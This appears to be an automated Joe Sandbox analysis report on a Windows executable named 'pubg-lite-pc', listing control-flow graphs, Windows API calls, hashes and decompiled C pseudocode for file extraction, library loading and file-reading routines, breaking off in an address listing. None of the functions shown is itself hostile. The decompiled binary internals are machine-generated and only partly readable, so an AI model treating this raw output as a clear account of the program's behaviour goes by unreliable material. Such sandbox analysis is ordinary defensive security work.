9cf0d7-9cf0e0 1081->1082 1082->1082 1085 9cf0e2-9cf0eb call 939140 1082->1085 1085->1080 1086->1053 1087->1086
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Error:$Failed to extract file:$Not enough disk space to extract file:
                                                                                                • API String ID: 0-4103669389
                                                                                                • Opcode ID: 866096955bc45e5cde0ba8c30231f9f66f6b5cd86d87494bd9dbabebff2dfcf9
                                                                                                • Instruction ID: 2f9794bde265d6dfbaeab6b2eeef311068df8ea56726adbcfeabad22df413a1e
                                                                                                • Opcode Fuzzy Hash: 866096955bc45e5cde0ba8c30231f9f66f6b5cd86d87494bd9dbabebff2dfcf9
                                                                                                • Instruction Fuzzy Hash: 0432BF71A00645EFDB04CFA8C894FADBBB5BF45324F14816DE815AB292DB70ED05CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A42D0A Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 214libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1110 a42d0a-a42d75 call a42a6b 1113 a42d77-a42d96 call a42ca8 RaiseException 1110->1113 1114 a42d9b-a42dbe 1110->1114 1123 a42f72-a42f76 1113->1123 1116 a42dc0 1114->1116 1117 a42dc3-a42dd0 1114->1117 1116->1117 1118 a42df1-a42df3 1117->1118 1119 a42dd2-a42de5 1117->1119 1121 a42e8c-a42e91 1118->1121 1122 a42df9-a42dfb 1118->1122 1135 a42f47-a42f4f 1119->1135 1146 a42deb 1119->1146 1127 a42ea5-a42ea7 1121->1127 1128 a42e93-a42ea3 1121->1128 1125 a42e13-a42e24 LoadLibraryExA 1122->1125 1126 a42dfd-a42e11 1122->1126 1131 a42e74-a42e7d 1125->1131 1132 a42e26-a42e37 GetLastError 1125->1132 1126->1125 1126->1131 1129 a42f42-a42f45 1127->1129 1130 a42ead-a42eb5 1127->1130 1128->1127 1129->1135 1133 a42ee4-a42ef2 GetProcAddress 1130->1133 1134 a42eb7-a42eba 1130->1134 1137 a42e86 1131->1137 1138 a42e7f-a42e80 FreeLibrary 1131->1138 1141 a42e4f-a42e6f call a42ca8 RaiseException 1132->1141 1142 a42e39-a42e4d 1132->1142 1133->1129 1148 a42ef4-a42f05 GetLastError 1133->1148 1134->1133 1143 a42ebc-a42ec6 1134->1143 1144 a42f51-a42f69 1135->1144 1145 a42f6b-a42f70 call a42ca8 1135->1145 1137->1121 1138->1137 1141->1123 1142->1131 1142->1141 1143->1133 1150 a42ec8-a42ecf 1143->1150 1144->1145 1145->1123 1146->1118 1152 a42f07-a42f1b 1148->1152 1153 a42f1d-a42f3f call a42ca8 RaiseException call a42a6b 1148->1153 1150->1133 1157 a42ed1-a42ed5 1150->1157 1152->1129 1152->1153 1153->1129 1157->1133 1163 a42ed7-a42ee2 1157->1163 1163->1129 1163->1133
                                                                                                APIs
                                                                                                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A42D8E
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 00A42E1A
                                                                                                • GetLastError.KERNEL32 ref: 00A42E26
                                                                                                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00A42E66
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                                • String ID: $
                                                                                                • API String ID: 948315288-3993045852
                                                                                                • Opcode ID: 19f84c72abd94edcead9050320349c3bb1454cbd544083902ff923105fe481f1
                                                                                                • Instruction ID: 395cc9acff98a3cd0054d4868fe4d08a6de4357a363496818044afc1b816f7b4
                                                                                                • Opcode Fuzzy Hash: 19f84c72abd94edcead9050320349c3bb1454cbd544083902ff923105fe481f1
                                                                                                • Instruction Fuzzy Hash: E4814D75A01219DFDB11CF94D884BAEBBB9FF98350B95406AF900A7311DB71DE06CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009EF6E0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 43libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1168 9ef6e0-9ef6e7 1169 9ef6ee-9ef705 LoadLibraryW 1168->1169 1170 9ef6e9-9ef6eb 1168->1170 1171 9ef71d-9ef71f 1169->1171 1172 9ef707-9ef717 1169->1172 1173 9ef727-9ef779 GetProcAddress * 4 1171->1173 1174 9ef721-9ef724 1171->1174 1172->1171
                                                                                                APIs
                                                                                                • LoadLibraryW.KERNEL32(?,?,009D03AB,?,?,?,?,?), ref: 009EF6F5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID: EndExtraction$ExtractAllFiles$GetTotalFilesSize$InitExtraction
                                                                                                • API String ID: 1029625771-3462492388
                                                                                                • Opcode ID: 7cc364f7cb1c753fd0ba80dd40742f6023b7b254b5d4252a29ecf3498abb3bb5
                                                                                                • Instruction ID: 4f7b438314da5912839461fc8322267200795f0168509a6cbff7e2f9b8c4117f
                                                                                                • Opcode Fuzzy Hash: 7cc364f7cb1c753fd0ba80dd40742f6023b7b254b5d4252a29ecf3498abb3bb5
                                                                                                • Instruction Fuzzy Hash: 01015EB5A40210ABCF15DFA5AC1CDA97BAEF7247107004C2BE51587372DA754A52CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A430ED Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1176 a430ed-a430f8 1177 a43107-a4311e LoadLibraryExA 1176->1177 1178 a430fa-a43106 DecodePointer 1176->1178 1179 a43120-a43135 call a4319d 1177->1179 1180 a43198 1177->1180 1179->1180 1184 a43137-a4314c call a4319d 1179->1184 1181 a4319a-a4319c 1180->1181 1184->1180 1187 a4314e-a43163 call a4319d 1184->1187 1187->1180 1190 a43165-a4317a call a4319d 1187->1190 1190->1180 1193 a4317c-a43196 DecodePointer 1190->1193 1193->1181
                                                                                                APIs
                                                                                                • DecodePointer.KERNEL32(?,?,?,00A43433,00B02490,?,?,?,009F0C20,00000000,?,00000000,F4D3B90A), ref: 00A430FF
                                                                                                • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,00A43433,00B02490,?,?,?,009F0C20,00000000,?,00000000,F4D3B90A), ref: 00A43114
                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,F4D3B90A), ref: 00A43190
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: DecodePointer$LibraryLoad
                                                                                                • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                                                                                                • API String ID: 1423960858-1745123996
                                                                                                • Opcode ID: 2b0f87994b511a5eadb8b154caaadee34531dcd5471633834f17879f59432997
                                                                                                • Instruction ID: 1658526b26173f2c30cfc2fb02acb78bcbd1a62cd33e989461b8b7c790fd3577
                                                                                                • Opcode Fuzzy Hash: 2b0f87994b511a5eadb8b154caaadee34531dcd5471633834f17879f59432997
                                                                                                • Instruction Fuzzy Hash: CF0180366813117ADE15E718DD0FF8D3BD45F61749F040290FD0A6A2E3EAA18B09C595
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009EFBF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 184fileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1194 9efbf0-9efc43 call 9e9f50 1197 9efcdd-9efce5 1194->1197 1198 9efc49-9efc5d call a45a61 1194->1198 1199 9efe9a-9efea2 call 9eff30 1197->1199 1200 9efceb 1197->1200 1198->1197 1210 9efc5f-9efcda call a47980 call a3e070 call a45a17 1198->1210 1214 9efea6-9efec3 call a4566b 1199->1214 1203 9efd1e-9efd3a SHGetFolderPathW 1200->1203 1204 9efced-9efcf6 1200->1204 1208 9efd3c 1203->1208 1209 9efd4a-9efd59 1203->1209 1204->1199 1207 9efcfc 1204->1207 1207->1203 1215 9efcfe-9efd07 1207->1215 1216 9efd40-9efd48 1208->1216 1212 9efd5b 1209->1212 1213 9efd72-9efd83 call 9c2950 1209->1213 1210->1197 1218 9efd60-9efd68 1212->1218 1228 9efda7-9efe5e call a47980 GetTempPathW call a47980 GetTempFileNameW call 9eff30 Wow64DisableWow64FsRedirection CopyFileW 1213->1228 1229 9efd85 1213->1229 1215->1199 1221 9efd0d 1215->1221 1216->1209 1216->1216 1218->1218 1223 9efd6a-9efd6c 1218->1223 1221->1203 1226 9efd0f-9efd18 1221->1226 1223->1199 1223->1213 1226->1199 1226->1203 1240 9efe68-9efe76 1228->1240 1241 9efe60-9efe63 call 9eff30 1228->1241 1231 9efd90-9efd9c 1229->1231 1231->1199 1234 9efda2-9efda5 1231->1234 1234->1228 1234->1231 1240->1214 1243 9efe78-9efe98 Wow64RevertWow64FsRedirection 1240->1243 1241->1240 1243->1214
                                                                                                APIs
                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,F4D3B90A,00000000,00000000,?), ref: 009EFD2D
                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 009EFDC9
                                                                                                • GetTempFileNameW.KERNEL32(?,shim_clone,00000000,?), ref: 009EFDFA
                                                                                                • Wow64DisableWow64FsRedirection.KERNEL32(00000000,?), ref: 009EFE2D
                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 009EFE4F
                                                                                                  • Part of subcall function 00A45A61: EnterCriticalSection.KERNEL32(00B0282C,?,?,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45A6C
                                                                                                  • Part of subcall function 00A45A61: LeaveCriticalSection.KERNEL32(00B0282C,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45AA9
                                                                                                • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 009EFE7E
                                                                                                  • Part of subcall function 00A45A17: EnterCriticalSection.KERNEL32(00B0282C,?,?,00929407,00B0345C,00A9C710), ref: 00A45A21
                                                                                                  • Part of subcall function 00A45A17: LeaveCriticalSection.KERNEL32(00B0282C,?,00929407,00B0345C,00A9C710), ref: 00A45A54
                                                                                                  • Part of subcall function 00A45A17: RtlWakeAllConditionVariable.NTDLL ref: 00A45ACB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionWow64$EnterFileLeavePathRedirectionTemp$ConditionCopyDisableFolderNameRevertVariableWake
                                                                                                • String ID: shim_clone
                                                                                                • API String ID: 1304637219-3944563459
                                                                                                • Opcode ID: 4820d1c2cdbc2a9552e1aab3c01d664a60fbbd065a30bb9260bab6c13d57fe36
                                                                                                • Instruction ID: d0a96c24476c999fea57887b000063c6a1124d538bb4ca44ca2fc958ccfad251
                                                                                                • Opcode Fuzzy Hash: 4820d1c2cdbc2a9552e1aab3c01d664a60fbbd065a30bb9260bab6c13d57fe36
                                                                                                • Instruction Fuzzy Hash: 9071E470A00288AFEB21DF25DC59B9DB7F9EB94B10F1441AAE405A71D2DB71AE44CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D982550 Relevance: 10.7, APIs: 7, Instructions: 243fileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1375 6d982550-6d98259a 1376 6d98259c 1375->1376 1377 6d98259e-6d9825b5 1375->1377 1376->1377 1378 6d9825b9-6d9825eb CreateFileW 1377->1378 1379 6d9825b7 1377->1379 1380 6d9825ed-6d9825f2 1378->1380 1381 6d9825f7-6d98261d 1378->1381 1379->1378 1382 6d98280c-6d98281c 1380->1382 1383 6d98262a 1381->1383 1384 6d98261f-6d982628 1381->1384 1387 6d98282c-6d98284b call 6d98a13f 1382->1387 1388 6d98281e-6d982825 CloseHandle 1382->1388 1385 6d982640-6d98265d ReadFile 1383->1385 1386 6d98262c-6d98263d call 6d97fe90 1383->1386 1384->1385 1391 6d98265f-6d982662 1385->1391 1392 6d982667-6d982678 call 6d985cd0 1385->1392 1386->1385 1388->1387 1395 6d9827fd-6d982809 call 6d964bb0 1391->1395 1399 6d98267a-6d98267d 1392->1399 1400 6d982682-6d982685 1392->1400 1395->1382 1399->1395 1402 6d982690-6d9826ad SetFilePointer GetFileSize 1400->1402 1403 6d982687-6d98268a 1400->1403 1405 6d9826af-6d9826b1 1402->1405 1406 6d9826b6-6d9826c0 1402->1406 1403->1402 1404 6d98271d-6d982748 1403->1404 1407 6d98274e 1404->1407 1408 6d9827ef 1404->1408 1405->1395 1409 6d9826ca 1406->1409 1410 6d9826c2-6d9826c8 1406->1410 1412 6d982750-6d98276d call 6d984450 1407->1412 1411 6d9827f1-6d9827f8 call 6d965cf0 1408->1411 1413 6d982700-6d982713 ReadFile 1409->1413 1414 6d9826cc-6d9826d3 1409->1414 1410->1413 1411->1395 1423 6d98279a-6d9827e2 call 6d965cf0 call 6d964ec0 call 6d98c450 ReadFile 1412->1423 1424 6d98276f-6d982797 call 6d965cf0 1412->1424 1413->1404 1415 6d982715-6d982718 1413->1415 1418 6d9826e1-6d9826fa call 6d98c450 1414->1418 1419 6d9826d5-6d9826df call 6d97fe90 1414->1419 1415->1395 1427 6d9826fd 1418->1427 1419->1427 1436 6d98284e-6d982853 1423->1436 1437 6d9827e4-6d9827e9 1423->1437 1424->1423 1427->1413 1436->1411 1437->1408 1437->1412
                                                                                                C-Code - Quality: 86%
                                                                                                			E6D982550(short* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct _OVERLAPPED* _v16;
				char _v24;
				signed int _v32;
				struct _OVERLAPPED* _v36;
				struct _OVERLAPPED* _v40;
				char _v56;
				char _v80;
				struct _OVERLAPPED* _v84;
				struct _OVERLAPPED* _v88;
				void* _v92;
				long _v96;
				void* _v100;
				short* _v104;
				struct _OVERLAPPED* _v108;
				intOrPtr _v112;
				void* __ebx;
				void* __ebp;
				signed int _t85;
				signed int _t86;
				WCHAR* _t88;
				void* _t89;
				long _t93;
				intOrPtr _t94;
				int _t98;
				long _t100;
				short* _t106;
				char* _t107;
				int _t114;
				long _t120;
				void* _t126;
				short* _t127;
				void* _t128;
				void* _t130;
				struct _OVERLAPPED* _t141;
				void* _t145;
				void* _t148;
				long _t151;
				void* _t152;
				short* _t155;
				short* _t158;
				void* _t164;
				signed int _t167;
				void* _t168;
				void* _t171;

				_t150 = __edi;
				_t127 = __ecx;
				_t126 = _t164;
				_t167 = (_t164 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t126 + 4));
				_t162 = _t167;
				_push(0xffffffff);
				_push(0x6d9b9065);
				_push( *[fs:0x0]);
				_push(_t126);
				_t168 = _t167 - 0x58;
				_t85 =  *0x6d9e5024; // 0xe85bfa76
				_t86 = _t85 ^ _t167;
				_v32 = _t86;
				_push(__esi);
				_push(__edi);
				_push(_t86);
				 *[fs:0x0] =  &_v24;
				_t155 = __ecx;
				_v104 = __ecx;
				_t88 =  *(_t126 + 8);
				if( *((intOrPtr*)(__ecx + 0x14)) >= 8) {
					_t127 =  *((intOrPtr*)(__ecx));
				}
				 *(_t155 + 0x10) = 0;
				 *_t127 = 0;
				 *((intOrPtr*)(_t155 + 0x18)) = 0xa;
				if(_t88[0xa] >= 8) {
					_t88 =  *_t88;
				}
				_t89 = CreateFileW(_t88, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t128 = _t89;
				_v112 = 0x6d9c8108;
				_v100 = _t128;
				_v108 = _t128;
				_v16 = 0;
				if(_t128 != 0xffffffff) {
					_v92 = 0;
					_v88 = 0;
					_v84 = 0;
					_v16 = 1;
					_t145 = _v92;
					__eflags = _v88 - _t145 - 0x1000;
					if(__eflags <= 0) {
						if(__eflags < 0) {
							_push(_t128);
							L6D97FE90(_t126,  &_v92, _t150, 0x1000);
							_t145 = _v92;
							_t128 = _v100;
						}
					} else {
						_t21 = _t145 + 0x1000; // 0x1000
						_v88 = _t21;
					}
					_v96 = 0;
					_t151 = 0x1000;
					_t93 = ReadFile(_t128, _t145, 0x1000,  &_v96, 0);
					__eflags = _t93;
					if(_t93 != 0) {
						_t94 = L6D985CD0(_v92, _v96);
						 *((intOrPtr*)(_t155 + 0x18)) = _t94;
						__eflags = _t94 - 0xa;
						if(_t94 != 0xa) {
							__eflags = _t94 - 2;
							if(_t94 == 2) {
								L16:
								_t152 = _v100;
								SetFilePointer(_t152, 0, 0, 0);
								_t151 = GetFileSize(_t152, 0);
								__eflags = _t151;
								if(_t151 != 0) {
									_t130 = _v92;
									_t148 = _v88 - _t130;
									__eflags = _t151 - _t148;
									if(__eflags >= 0) {
										if(__eflags > 0) {
											__eflags = _t151 - _v84 - _t130;
											if(_t151 <= _v84 - _t130) {
												_t141 = _v88;
												_t120 = _t151 - _t148;
												__eflags = _t120;
												L6D98C450(_t151, _t141, 0, _t120);
												_v88 = _t141 + _t120;
												_t168 = _t168 + 0xc;
												_t155 = _v104;
											} else {
												_push(_t130);
												L6D97FE90(_t126,  &_v92, _t151, _t151);
											}
											_t130 = _v92;
										}
									} else {
										_v88 = _t130 + _t151;
									}
									_t98 = ReadFile(_v100, _t130, _t151,  &_v96, 0);
									__eflags = _t98;
									if(_t98 != 0) {
										L27:
										_v40 = 0;
										_v36 = 0;
										_v40 = 0;
										_v36 = 7;
										_v56 = 0;
										_v16 = 2;
										_t100 = _v96;
										__eflags = _t100;
										if(__eflags == 0) {
											L33:
											__eflags = 0;
											L34:
											_v16 = 1;
											L6D965CF0(_t126,  &_v56, _t151);
											goto L35;
										}
										while(1) {
											_push( *((intOrPtr*)(_t155 + 0x18)));
											_push(_t100);
											_t106 = L6D984450( &_v80, _v92, _t151, _t155, __eflags);
											_t171 = _t168 + 8;
											_t158 = _t106;
											_v16 = 3;
											_t107 =  &_v56;
											__eflags = _t107 - _t158;
											if(_t107 != _t158) {
												L6D965CF0(_t126, _t107, _t151);
												asm("movups xmm0, [esi]");
												__eflags = 0;
												asm("movups [ebp-0x2c], xmm0");
												asm("movq xmm0, [esi+0x10]");
												asm("movq [ebp-0x1c], xmm0");
												 *(_t158 + 0x10) = 0;
												 *((intOrPtr*)(_t158 + 0x14)) = 7;
												 *_t158 = 0;
											}
											_v16 = 2;
											L6D965CF0(_t126,  &_v80, _t151);
											__eflags = _v36 - 8;
											_t110 =  >=  ? _v56 :  &_v56;
											_t155 = _v104;
											E6D964EC0(_t155,  >=  ? _v56 :  &_v56, _v40);
											L6D98C450(_t151, _v92, 0, _t151);
											_t168 = _t171 + 0xc;
											_t114 = ReadFile(_v100, _v92, _t151,  &_v96, 0);
											__eflags = _t114;
											if(_t114 == 0) {
												break;
											}
											_t100 = _v96;
											__eflags = _t100;
											if(__eflags != 0) {
												continue;
											}
											goto L33;
										}
										goto L34;
									} else {
										goto L35;
									}
								}
								goto L35;
							}
							__eflags = _t94 - 3;
							if(_t94 != 3) {
								goto L27;
							}
							goto L16;
						}
						goto L35;
					} else {
						L35:
						_v16 = 0;
						E6D964BB0(_t126,  &_v92, _t151);
						_t128 = _v100;
						goto L36;
					}
				} else {
					L36:
					_v16 = 0xffffffff;
					_v112 = 0x6d9c8108;
					if(_t128 != 0) {
						CloseHandle(_t128);
						_v108 = 0;
					}
					 *[fs:0x0] = _v24;
					return L6D98A13F(_v32 ^ _t162);
				}
			}
















































                                                                                                0x6d982550
                                                                                                0x6d982550
                                                                                                0x6d982551
                                                                                                0x6d982559
                                                                                                0x6d982560
                                                                                                0x6d982564
                                                                                                0x6d982566
                                                                                                0x6d982568
                                                                                                0x6d982573
                                                                                                0x6d982574
                                                                                                0x6d982575
                                                                                                0x6d982578
                                                                                                0x6d98257d
                                                                                                0x6d98257f
                                                                                                0x6d982582
                                                                                                0x6d982583
                                                                                                0x6d982584
                                                                                                0x6d982588
                                                                                                0x6d98258e
                                                                                                0x6d982590
                                                                                                0x6d982597
                                                                                                0x6d98259a
                                                                                                0x6d98259c
                                                                                                0x6d98259c
                                                                                                0x6d98259e
                                                                                                0x6d9825a7
                                                                                                0x6d9825aa
                                                                                                0x6d9825b5
                                                                                                0x6d9825b7
                                                                                                0x6d9825b7
                                                                                                0x6d9825cc
                                                                                                0x6d9825d2
                                                                                                0x6d9825d4
                                                                                                0x6d9825db
                                                                                                0x6d9825de
                                                                                                0x6d9825e1
                                                                                                0x6d9825eb
                                                                                                0x6d9825f7
                                                                                                0x6d9825fe
                                                                                                0x6d982605
                                                                                                0x6d98260c
                                                                                                0x6d982613
                                                                                                0x6d982618
                                                                                                0x6d98261d
                                                                                                0x6d98262a
                                                                                                0x6d98262c
                                                                                                0x6d982635
                                                                                                0x6d98263a
                                                                                                0x6d98263d
                                                                                                0x6d98263d
                                                                                                0x6d98261f
                                                                                                0x6d98261f
                                                                                                0x6d982625
                                                                                                0x6d982625
                                                                                                0x6d982645
                                                                                                0x6d98264d
                                                                                                0x6d982655
                                                                                                0x6d98265b
                                                                                                0x6d98265d
                                                                                                0x6d98266d
                                                                                                0x6d982672
                                                                                                0x6d982675
                                                                                                0x6d982678
                                                                                                0x6d982682
                                                                                                0x6d982685
                                                                                                0x6d982690
                                                                                                0x6d982690
                                                                                                0x6d98269a
                                                                                                0x6d9826a9
                                                                                                0x6d9826ab
                                                                                                0x6d9826ad
                                                                                                0x6d9826b9
                                                                                                0x6d9826bc
                                                                                                0x6d9826be
                                                                                                0x6d9826c0
                                                                                                0x6d9826ca
                                                                                                0x6d9826d1
                                                                                                0x6d9826d3
                                                                                                0x6d9826e1
                                                                                                0x6d9826e6
                                                                                                0x6d9826e6
                                                                                                0x6d9826ef
                                                                                                0x6d9826f4
                                                                                                0x6d9826f7
                                                                                                0x6d9826fa
                                                                                                0x6d9826d5
                                                                                                0x6d9826d5
                                                                                                0x6d9826da
                                                                                                0x6d9826da
                                                                                                0x6d9826fd
                                                                                                0x6d9826fd
                                                                                                0x6d9826c2
                                                                                                0x6d9826c5
                                                                                                0x6d9826c5
                                                                                                0x6d98270b
                                                                                                0x6d982711
                                                                                                0x6d982713
                                                                                                0x6d98271d
                                                                                                0x6d98271f
                                                                                                0x6d982726
                                                                                                0x6d98272d
                                                                                                0x6d982734
                                                                                                0x6d98273b
                                                                                                0x6d98273f
                                                                                                0x6d982743
                                                                                                0x6d982746
                                                                                                0x6d982748
                                                                                                0x6d9827ef
                                                                                                0x6d9827ef
                                                                                                0x6d9827f1
                                                                                                0x6d9827f1
                                                                                                0x6d9827f8
                                                                                                0x00000000
                                                                                                0x6d9827f8
                                                                                                0x6d982750
                                                                                                0x6d982750
                                                                                                0x6d982759
                                                                                                0x6d98275a
                                                                                                0x6d98275f
                                                                                                0x6d982762
                                                                                                0x6d982764
                                                                                                0x6d982768
                                                                                                0x6d98276b
                                                                                                0x6d98276d
                                                                                                0x6d982771
                                                                                                0x6d982776
                                                                                                0x6d982779
                                                                                                0x6d98277b
                                                                                                0x6d98277f
                                                                                                0x6d982784
                                                                                                0x6d982789
                                                                                                0x6d982790
                                                                                                0x6d982797
                                                                                                0x6d982797
                                                                                                0x6d98279a
                                                                                                0x6d9827a1
                                                                                                0x6d9827a6
                                                                                                0x6d9827b0
                                                                                                0x6d9827b4
                                                                                                0x6d9827ba
                                                                                                0x6d9827c5
                                                                                                0x6d9827ca
                                                                                                0x6d9827da
                                                                                                0x6d9827e0
                                                                                                0x6d9827e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9827e4
                                                                                                0x6d9827e7
                                                                                                0x6d9827e9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9827e9
                                                                                                0x00000000
                                                                                                0x6d982715
                                                                                                0x00000000
                                                                                                0x6d982715
                                                                                                0x6d982713
                                                                                                0x00000000
                                                                                                0x6d9826af
                                                                                                0x6d982687
                                                                                                0x6d98268a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d98268a
                                                                                                0x00000000
                                                                                                0x6d98265f
                                                                                                0x6d9827fd
                                                                                                0x6d9827fd
                                                                                                0x6d982804
                                                                                                0x6d982809
                                                                                                0x00000000
                                                                                                0x6d982809
                                                                                                0x6d9825ed
                                                                                                0x6d98280c
                                                                                                0x6d98280c
                                                                                                0x6d982813
                                                                                                0x6d98281c
                                                                                                0x6d98281f
                                                                                                0x6d982825
